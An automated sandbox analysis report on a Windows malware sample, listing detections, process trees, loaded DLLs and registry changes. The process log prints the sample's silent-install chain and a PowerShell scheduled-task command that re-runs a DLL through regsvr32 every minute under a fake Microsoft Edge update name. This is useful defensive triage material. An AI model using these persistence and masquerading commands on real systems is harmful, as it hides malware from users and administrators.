Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: h40thEqmz6.exe	Virustotal: Detection: 63%
Source: h40thEqmz6.exe	ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\h40thEqmz6.exe

File read: C:\Users\user\Desktop\h40thEqmz6.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\h40thEqmz6.exe "C:\Users\user\Desktop\h40thEqmz6.exe"
Source: C:\Users\user\Desktop\h40thEqmz6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp "C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp" /SL5="$1041E,450685,141312,C:\Users\user\Desktop\h40thEqmz6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Process created: C:\Users\user\Desktop\h40thEqmz6.exe "C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\h40thEqmz6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp "C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp" /SL5="$2042C,450685,141312,C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{7A7D6BFF-F589-4298-BDDA-3BBA941A2598}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Coat.dll
Source: C:\Users\user\Desktop\h40thEqmz6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp "C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp" /SL5="$1041E,450685,141312,C:\Users\user\Desktop\h40thEqmz6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Process created: C:\Users\user\Desktop\h40thEqmz6.exe "C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\Desktop\h40thEqmz6.exe	Process created: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp "C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp" /SL5="$2042C,450685,141312,C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{7A7D6BFF-F589-4298-BDDA-3BBA941A2598}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Coat.dll	Jump to behavior

Source: C:\Users\user\Desktop\h40thEqmz6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\h40thEqmz6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\h40thEqmz6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\h40thEqmz6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File Manager_is1

Jump to behavior

Data Obfuscation

.NET source code contains potential unpacker

Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 6.2.regsvr32.exe.26e130d.2.raw.unpack, ClientSocket.cs	.Net Code: Invoke
Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 6.2.regsvr32.exe.a5b04d.0.raw.unpack, ClientSocket.cs	.Net Code: Invoke
Source: 6.2.regsvr32.exe.25c0000.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 6.2.regsvr32.exe.25c0000.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke

Suspicious powershell command line found

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }"
